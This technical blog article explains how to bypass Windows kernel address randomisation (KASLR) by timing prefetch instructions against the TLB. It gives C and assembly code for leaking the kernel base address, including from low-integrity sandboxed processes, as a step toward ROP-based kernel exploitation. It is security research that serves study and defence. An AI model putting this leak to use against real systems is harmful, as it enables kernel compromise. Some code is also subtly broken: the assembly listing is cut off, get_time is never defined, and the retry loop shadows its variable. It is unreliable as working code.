May 6

Bypassing KASLR in Windows: An attack on the mechanism of pre-selection

Introduction

In today’s world, exploiting vulnerabilities in an operating system kernel is one of the most challenging and high‑value tasks: once an attacker compromises the kernel, they effectively gain control over the entire system. Modern operating systems such as Windows, however, include powerful security mechanisms designed to complicate—or outright prevent—successful attacks. One of the key protections is Address Space Layout Randomization (ASLR), and in the kernel context—Kernel ASLR (KASLR). KASLR adds randomness to the base load addresses of key kernel components, making it impossible to rely on static addresses in exploits.

In this article, we will look at one way to bypass KASLR in Windows based on an information leak via a side-channel in the prefetch mechanism. We will break down how KASLR works, how it relates to DEP and SMEP, and explain how attacking prefetch can reveal the kernel base address—opening the door to further kernel vulnerability exploitation.

What is KASLR and how does it work in Windows?

KASLR (Kernel Address Space Layout Randomization) is a protection mechanism used in modern operating systems, including Windows, to improve security and make vulnerability exploitation harder. It works by introducing randomness into where key kernel data structures are placed in memory on each system boot. This means that the address of, for example, the Interrupt Descriptor Table (IDT) or the system call table will change from boot to boot. The main goal of KASLR is to complicate attacks that rely on knowing the exact location of certain data structures in memory. Many exploits—especially those targeting kernel vulnerabilities—require the attacker to know the address of a function, a data structure, or a global variable in the kernel to redirect control flow or manipulate data. On each boot, the loader and the kernel (ntoskrnl.exe) generate a random offset that is applied to key memory regions. This offset changes the base addresses of system structures.

Protection mechanisms: DEP, SMEP, and ASLR

Before diving into KASLR in more detail, let’s briefly review the security measures that are intended to work together with randomized memory layout to provide the strongest possible protection for the system.

Data Execution Prevention (DEP): DEP, also known as the NX (No‑eXecute) bit, prevents instructions from executing in memory regions intended only for data. This means that if an attacker places malicious code in such an area, the system will not allow it to run—the program will crash.
Supervisor Mode Execution Prevention (SMEP): SMEP strengthens security by complementing DEP. It prevents the kernel from executing instructions from memory pages that belong to user processes. As a result, even if an attacker gains control inside the kernel, they cannot run malicious code placed in user-mode memory.

Bypassing DEP and SMEP with ROP

Despite the effectiveness of DEP and SMEP, they are not insurmountable. One common way to bypass them is code reuse. In this approach, a particularly effective technique is Return‑Oriented Programming (ROP). ROP is based on using short instruction sequences already present in memory, each ending with a return instruction (ret). These sequences are called “gadgets.” An attacker selects gadgets that perform the needed actions—such as moving data, arithmetic, or calling functions—and builds them into a chain (gadget chain). This chain, along with required data and gadget addresses, is written onto the stack so it can be used instead of normal code. When execution reaches a return instruction (ret), the next gadget address is taken from the stack and loaded into the register that controls the current instruction pointer (RIP, EIP, or PC). This causes the next gadget in the chain to run. In this way, an attacker can perform arbitrary actions by reusing existing code in memory, while bypassing DEP and SMEP.

The KASLR problem and why it must be bypassed

To build a ROP chain successfully, you need to know the exact gadget addresses in memory. However, KASLR randomizes the kernel base address—and therefore gadget addresses—making them unpredictable. If the kernel base address is unknown, you cannot compute gadget addresses even if you know their offsets relative to the base. That’s why bypassing KASLR is a critical step in exploiting Windows kernel vulnerabilities: it allows you to recover the kernel base address, and from it compute absolute gadget addresses in memory. Nevertheless, for some reason Microsoft does not treat the kernel base address as something especially secret or carefully guarded. Moreover, there is not even a reward for bypassing KASLR under the vulnerability reporting program. In practice, there are several almost “official” ways to get this address—one of them is using the API function called EnumDeviceDrivers.

Below is an example program that uses this method.

#include <stdio.h>
  #include <Windows.h>
  #include <Psapi.h>

  int main() {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    EnumDeviceDrivers(drivers, sizeof(drivers), & cbNeeded);
    printf("NtOSKrnl addr: %p\n", drivers[0]);
    return 0;
  }

When calling EnumDeviceDrivers, we get an array of driver addresses in the system, and entry zero always contains the kernel address.

Fig. 1. EnumDeviceDrivers result.

However, this method does not always work—it only works in processes whose integrity level is Medium (Medium Integrity) or higher. While Medium is typically assigned to programs run by a normal user, there are cases where an application runs at a lower level, for example in a browser sandbox where Low Integrity is used. In that situation, if you run the same code from a Low Integrity process, you will see the following:

Fig. 2. Low vs Medium Integrity comparison.

In addition, starting with Windows 11 24H2, the EnumDeviceDrivers function requires the SeDebugPrivilege privilege to work correctly. Obtaining this privilege requires administrator rights in the operating system. Without SeDebugPrivilege, EnumDeviceDrivers cannot return real load addresses (ImageBase), and the array will contain zeros (NULL) instead (more details). In addition, antivirus software and endpoint detection and response systems (EDR) may intercept such API calls, block them, or spoof returned data to protect the system from potential attacks. This introduces additional constraints and makes these seemingly common techniques harder to use.

Next, we will look at an alternative technique for finding the required address. But before we get to the attack itself, let’s briefly examine which mechanisms make it possible in the first place.

Prefetching and its interaction with the TLB

It is well known that modern processors use prefetching to improve overall system performance. Prefetching is a technique where the system tries to predict which data the CPU may need soon and loads it into cache before it is actually requested. The goal is to reduce memory access latency, because the needed data is already in faster cache. In other words, instead of waiting for a CPU request, the system attempts to anticipate what will be needed and prepare it in advance.

There are several main types of prefetching:

Hardware prefetching: Implemented directly in the processor hardware. It typically uses algorithms based on previously observed memory access patterns. For example, if the CPU accesses array elements sequentially, hardware prefetching may automatically load subsequent elements into cache.
Software prefetching: Implemented via special instructions inserted into a program’s code. The programmer explicitly specifies which data should be prefetched. This provides more control but requires understanding access patterns and can increase code size.
Correlation-based prefetching: Uses information about past cache misses to predict future ones. If a miss occurred when accessing a particular address, the system may assume accesses to nearby addresses will also miss and prefetch them.
Sequential prefetching: Assumes data will be used sequentially. When sequential memory access is detected, the system starts prefetching subsequent data blocks.

Prefetching is only effective when the system can quickly determine the physical address of the data to be loaded. That is where the TLB (Translation Lookaside Buffer) comes in. The TLB is a small but very fast cache that stores recent (or frequently used) virtual‑to‑physical address translations. When the CPU accesses memory, it checks the TLB first. If the translation is found in the TLB (a TLB hit), the physical address is obtained almost instantly. If the translation is not in the TLB (a TLB miss), the CPU must perform a slower translation by walking the page tables.

Attacking prefetch to bypass KASLR

When programs run in an OS, some parts of executable code or data memory may be prefetched, but the more processes run concurrently, the less likely this becomes—because task switching by the scheduler reduces how often any given data is accessed, unlike the operating system kernel. Regardless of how many processes are running, the OS kernel exists as a single instance in physical memory, and all processes transfer control into the kernel address space when they make system calls—i.e., practically whenever they use WinAPI. As a result, certain parts of the kernel (or even the entire kernel) must reside in the TLB.

A side-channel attack on prefetch uses the timing difference of data loads depending on whether the address is present in the TLB or not. If the address is already in the TLB, prefetch completes quickly. If it is not in the TLB, prefetch is slower because a page table walk is required.

To measure access time precisely, we will use the rdtscp instruction, as well as prefetchnta and prefetcht2. To get reliable results, we must first enforce a strict execution order. In particular, before starting measurements we need serialization—ensuring that all prior memory writes are completed and visible to all CPU cores, and preventing instruction reordering by the CPU or compiler. This is critical because uncontrolled reordering can significantly distort timing results and make them unreliable. Using serialization instructions—in our case mfence and lfence—creates a clear synchronization point.

Example assembly listing for measuring access time:

masm
  time PROC
  mov rsi, rcx
  mfence
  rdtscp
  mov r9, rax
  mov r8, rdx
  xor rax, rax
  lfence
  prefetchnta byte ptr [rsi]
  prefetcht2 byte ptr [rsi]
  lfence
  rdtscp
  mov rdi, rax
  mov rsi, rdx
  mfence

Now we need to determine the range of possible addresses where the kernel may be located and which part of the kernel will be present in the TLB. Based on the information we have and our experiments, we found that the entire kernel resides in the TLB and occupies a little more than 12 MB, with addresses in the range from 0xfffff80000000000 to 0xfffff80800000000.

Therefore, we need to scan the address space and find a 12 MB range that can be accessed faster than the rest of memory. Thanks to the TLB, address translation is an order of magnitude faster, but access to physical memory still costs the same. Overall, memory access time decreases by about 30–40%. As a result, we can set a threshold at 70% of the average memory access time to classify a measurement as a TLB hit.

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <winternl.h>

#define SCAN_START 0xfffff80000000000
#define SCAN_END 0xfffff80800000000
#define NT_MAP_SIZE 0xC
#define STEP 0x100000
#define ARR_SIZE (SCAN_END - SCAN_START) / STEP

UINT64 get_nt_base();
UINT64 count_avg(UINT64* arr, int n);

int main(int argc, char** argv)
{
    UINT64 kernel_base = get_nt_base();
    while (kernel_base == 0)
    {
        UINT64 kernel_base = get_nt_base();
    }
    printf("Kernel base: %p\n", kernel_base);
    return 0;
}

UINT64 get_nt_base()
{
    UINT32 avg = 0;
    UINT64 timings[ARR_SIZE] = { 0 };

    for (UINT64 i = 0; i < 100; i++)
    {
        for (UINT64 idx = 0; idx < ARR_SIZE; idx++)
        {
            UINT64 test = SCAN_START + idx * STEP;
            UINT64 time = get_time((PVOID)test);
            timings[idx] += time;
        }
    }
    printf("[+] Timings received!\n");

    for (UINT64 i = 0; i < ARR_SIZE; i++)
    {
        timings[i] /= 100;
    }
    avg = count_avg(timings, ARR_SIZE);
    printf("[+] AVG counted: %d\n", avg);

    UINT32 diff = avg * 0.7;
    UINT64 kernel_base = 0;

    for (UINT64 i = 0; i < ARR_SIZE - NT_MAP_SIZE; i++)
    {
        UINT32 time = 0;
        for (UINT64 x = 0; x < NT_MAP_SIZE; x++)
        {
            if (timings[i + x] >= diff)
            {
                time = -1;
                break;
            }
            time = timings[i];
        }
        if (time == -1)
        {
            continue;
        }
        return SCAN_START + (i * STEP);
    }
    printf("[-] Base not found\n");
    return kernel_base;
}

UINT64 count_avg(UINT64* arr, int n)
{
    UINT64 sum = 0;
    for (int i = 0; i < n; i++) {
        sum += arr[i];
    }
    return sum/n;
}

Fig. 3. Determining the kernel base using prefetch.

During testing, running the process at Low and Medium Integrity produced identical results—unlike EnumDeviceDrivers.

Fig. 4. Running under Low Integrity.

Conclusion

To summarize, the prefetch attack based on timing memory access and checking for the presence of corresponding entries in the TLB shows that side channels can be an effective way to bypass KASLR. Notably, unlike classic approaches that rely on system calls returning kernel-space addresses (for example, EnumDeviceDrivers), this method remains effective in low-integrity environments (Low Integrity), which makes it potentially more dangerous. Of course, this attack is not a universal solution: it requires careful adaptation to the specific target system and a deep understanding of processor and operating system architecture.

It is also worth noting that the attack works only when KVA Shadowing is disabled. However, this is not considered a serious obstacle, because on modern versions of Windows 11 KVA Shadowing is disabled by default. Still, it serves as a clear example of how even basic mechanisms like prefetch, designed to optimize performance, can be used as an attack vector.